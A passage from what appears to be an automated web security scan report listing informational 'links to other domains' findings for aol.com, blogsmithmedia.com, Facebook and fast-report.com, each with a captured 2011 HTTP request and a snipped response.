<h2><a name="om_dl3_hdln" onclick=" " href="http://aol.sportingnews.com/ncaa-basketball/story/2011-03-26/butler-close-to-again-crashing-final-four-party-ncaa-tournament-2011" class=" lnid-sec1_lnk2 icid-maing|main5|dl3|sec1_lnk2|51921">How the Bulldogs Can Keep Dancing</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl3_cpy" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-03-26/butler-close-to-again-crashing-final-four-party-ncaa-tournament-2011" class=" lnid-sec1_lnk3 icid-maing|main5|dl3|sec1_lnk3|51921">Keys to winning for both teams</a>
...[SNIP]...
<li ><a name="om_dl3_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl3|sec3_lnk1|51921" href="http://aol.sportingnews.com/mlb/story/2011-03-26/mike-sweeney-retires-as-a-royal">Longtime Royals Infielder Retires</a>
...[SNIP]...
<li ><a name="om_dl3_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl3|sec3_lnk2|51921" href="http://aol.sportingnews.com/mlb/story/2011-03-26/diamondbacks-mike-hampton-announces-retirement">Two-Time All Star Pitcher Retires</a>
...[SNIP]...
<li ><a name="om_dl3_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl3|sec3_lnk3|51921" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-03-26/ohio-states-jared-sullinger-says-hes-returning-for-sophomore-season">Buckeyes Star to Return for 2012</a>
...[SNIP]...
20.92. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:38:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc25.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3185
Content-Length: 3185

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-51909 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
name="om_dl11_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl11|sec1_lnk1|51909" href="http://news.travel.aol.com/2011/03/25/must-see-sea-life-best-places-to-experience-ocean-creatures-up"><img height="217" alt="Sea Turtle" width="386" src="http://o.aolcdn.com/hss/storage/adam/433ecf591b359656083be77c3bcd5827/where-to-see-wonderful-sea-life-386mz032511.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl11_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl11|sec3_lnk1|51909" href="http://www.gadling.com/2011/03/26/37-skiers-were-stranded-in-yosemite-backcountry/">37 Skiers Stranded in Yosemite
</a>
...[SNIP]...
<li ><a name="om_dl11_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl11|sec3_lnk2|51909" href="http://www.huffingtonpost.com/2011/03/25/prince-harry-arctic-trek_n_840608.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2">Royal Going on 4-Week Arctic Trek

</a>
...[SNIP]...
20.93. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl14

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:38:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc30.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3249
Content-Length: 3249

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl1 plid-51937 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl1|sec1_lnk1|51937" href="http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2"><img height="217" alt="Geraldine Ferraro" width="386" src="http://o.aolcdn.com/hss/storage/adam/5d45a7237ae3cfe830bdac2e19dd237/wsgerry-217cn032611.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2" class=" lnid-sec1_lnk2 icid-maing|main5|dl1|sec1_lnk2|51937">Geraldine Ferraro Dies at 75
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html ?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2" class=" lnid-sec1_lnk3 icid-maing|main5|dl1|sec1_lnk3|51937">'A fighter for justice'


</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl1|sec3_lnk1|51937" href="http://www.huffingtonpost.com/2011/03/26/libyan-woman-rape-soldiers_n_840951.html?utm_source=aolhp&amp;utm_medium=referral&amp;utm_campaign=aolhp2">Libyan Woman Says Troops Raped Her

</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl1|sec3_lnk2|51937" href="http://www.aolnews.com/2011/03/26/us-rushes-freshwater-to-help-japan-nuclear-plant/">Japan Gov't Slams Nuke Plant Head
</a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl1|sec3_lnk3|51937" href="http://www.aolnews.com/2011/03/26/remembering-geraldine-ferraro-photos/">Photos: Remembering Geraldine Ferraro</a>
...[SNIP]...
20.94. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl9

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc03.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2973
Content-Length: 2973

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-51797 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</div>

<a id="dlimg" name="om_dl10_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl10|sec1_lnk1|51797" href="http://blog.moviefone.com/2011/03/22/boba-fett-jeremy-bulloch-star-wars-interview/"><img height="217" alt="Boba Fett" width="386" src="http://o.aolcdn.com/hss/storage/adam/35b342a876eb77ddd4e1549e66b2c7b/boba-fett-386ak032411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl10_hdln" href="http://blog.moviefone.com/2011/03/22/boba-fett-jeremy-bulloch-star-wars-interview/" class=" lnid-sec1_lnk2 icid-maing|main5|dl10|sec1_lnk2|51797">The Man Behind Boba Fett</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl10_cpy" href="http://blog.moviefone.com/2011/03/22/boba-fett-jeremy-bulloch-star-wars-interview/" class=" lnid-sec1_lnk3 icid-maing|main5|dl10|sec1_lnk3|51797">What it was like playing cult character</a>
...[SNIP]...
<li ><a name="om_dl10_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl10|sec3_lnk1|51797" href="http://blog.moviefone.com/2011/03/24/the-amazing-spider-man-sequel/">New 'Spider-Man' Sequel in Works</a>
...[SNIP]...
<li ><a name="om_dl10_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl10|sec3_lnk2|51797" href="http://www.comicsalliance.com/2011/03/24/japanese-x-men-plush-toys-dolls/">Hard to Believe These 'X-Men' Toys </a>
...[SNIP]...
<li ><a name="om_dl10_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl10|sec3_lnk3|51797" href="http://blog.moviefone.com/2011/03/24/troopers-series-star-wars/">Hilarious 'Star Wars' Spoof a Viral Hit</a>
...[SNIP]...
20.95. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc19.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3042
Content-Length: 3042

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-51769 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl7|sec1_lnk1|51769" href="http://www.walletpop.com/2011/03/24/1-1-billion-in-unclaimed-tax-refunds-could-some-be-yours/"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/7a7197eb7c2ba86235a4c0009a421332/unclaimed-money-386cs032511.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" onclick=" " href="http://www.walletpop.com/2011/03/24/1-1-billion-in-unclaimed-tax-refunds-could-some-be-yours/" class=" lnid-sec1_lnk2 icid-maing|main5|dl7|sec1_lnk2|51769">IRS Putting $1 Billion Up for Grabs</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.walletpop.com/2011/03/24/1-1-billion-in-unclaimed-tax-refunds-could-some-be-yours/" class=" lnid-sec1_lnk3 icid-maing|main5|dl7|sec1_lnk3|51769">How to know if you qualify</a>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl7|sec3_lnk1|51769" href="http://www.walletpop.com/2011/03/11/five-tax-season-secrets-from-a-tax-pro/">5 Tax Secrets Only Pros Know</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl7|sec3_lnk2|51769" href="http://www.walletpop.com/2011/03/18/what-if-i-cant-file-my-taxes-on-time/">What If I Can't File on Time?</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl7|sec3_lnk3|51769" href="http://www.walletpop.com/2011/03/23/ja-rule-faces-jail-time-for-guilty-plea-on-tax-charges/">Rapper Facing Jail Over Taxes</a>
...[SNIP]...
20.96. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:38:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc29.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3771
Content-Length: 3771

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-51833 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</b><img height="217" alt="Tori Burch black patent ballet flats" width="386" src="http://o.aolcdn.com/hss/storage/adam/636c79a91cfd06b3b375981a132032a8/birch-386az03252011.jpg"/></a>
...[SNIP]...
20.97. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; dlact=dl3; s_pers=%20s_getnr%3D1301171842858-Repeat%7C1364243842858%3B%20s_nrgvo%3DRepeat%7C1364243842861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc19.websys.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3018
Content-Length: 3018

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-51519 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</div>

<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing|main5|dl4|sec1_lnk1|51519" href="http://www.theboot.com/2011/03/22/steve-earle-ill-never-get-out-of-this-world-alive-new-album-interview/"><img height="217" alt="Steve Earle" width="386" src="http://o.aolcdn.com/hss/storage/adam/2726eabce8f0700343bdcad86677cb58/steve-earle-386a-032411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl4_hdln" href="http://www.theboot.com/2011/03/22/steve-earle-ill-never-get-out-of-this-world-alive-new-album-interview/" class=" lnid-sec1_lnk2 icid-maing|main5|dl4|sec1_lnk2|51519">'He Inherited the Disease From Me'
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl4_cpy" href="http://www.theboot.com/2011/03/22/steve-earle-ill-never-get-out-of-this-world-alive-new-album-interview/" class=" lnid-sec1_lnk3 icid-maing|main5|dl4|sec1_lnk3|51519">Candid talk with the music icon
</a>
...[SNIP]...
<li ><a name="om_dl4_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing|main5|dl4|sec3_lnk1|51519" href="http://www.spinner.com/2011/03/23/band-sell-name-website-buystocknet/">Band Auctions Name for $251,000
</a>
...[SNIP]...
<li ><a name="om_dl4_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing|main5|dl4|sec3_lnk2|51519" href="http://www.spinner.com/2011/03/23/nirvanas-hormoaning/">Rare Nirvana EP Will Be Reissued
</a>
...[SNIP]...
<li ><a name="om_dl4_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing|main5|dl4|sec3_lnk3|51519" href="http://www.spinner.com/2011/03/23/pete-townshend-regrets-joining-the-who/">Townshend Regrets Joining The Who
</a>
...[SNIP]...
20.98. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /www.citysbest.com/include/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Accept-Ranges: bytes
ntCoent-Length: 133631
Content-Type: application/javascript
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:51:19 GMT
Date: Sat, 26 Mar 2011 20:36:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 133631

(function($){var defaultOptions={signupServiceUrl:'http://newsletter.sandbox.asylum.com/newsletter_signup.php',standalone:false,verify:true,site:'asylum',list:'main',template:'welcome',formClass:'aol-
...[SNIP]...
<div style="width:100px;padding-bottom:10px;">';htmlBody=htmlBody+'<a href="http://mapq.st/map?q='+listingStreet+' '+listingCity+' '+listingState+' '+listingZip+' ('+listingName+')&maptype=map" target="_blank" class="map-link">Get Directions &#187;</a>
...[SNIP]...
20.99. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.96.49
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:26 GMT
Content-Length: 8259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/05jN5JkiQIj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/jDl2O6ZuAyq.js"></script>
...[SNIP]...
20.100. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<td class="text"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<td align="center">
<a href="http://www.microsoft.com/" target=_BLANK><img src="/images/fr_ms.gif" alt="Microsoft Certified Partner" width="115" height="52" border="0">
...[SNIP]...
<td align="center">
<a href="http://www.intel.com/" target=_BLANK><img src="/images/intel_sw.gif" alt="Intel Software Partner Program member" width="68" height="62" border="0">
...[SNIP]...
<td align="center">
<a href="http://tp.codegear.com/" target=_BLANK><img src="/images/ctplogo-small2.gif" border="0" alt="CodeGear - Where Developers Matter" width="209" height="81">
...[SNIP]...
</a>&nbsp;&nbsp;&middot;&nbsp;&nbsp;<a href="http://twitter.com/fastreports" target="_blank" class="botmenu">Fast Reports on Twitter</a>
...[SNIP]...
20.101. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

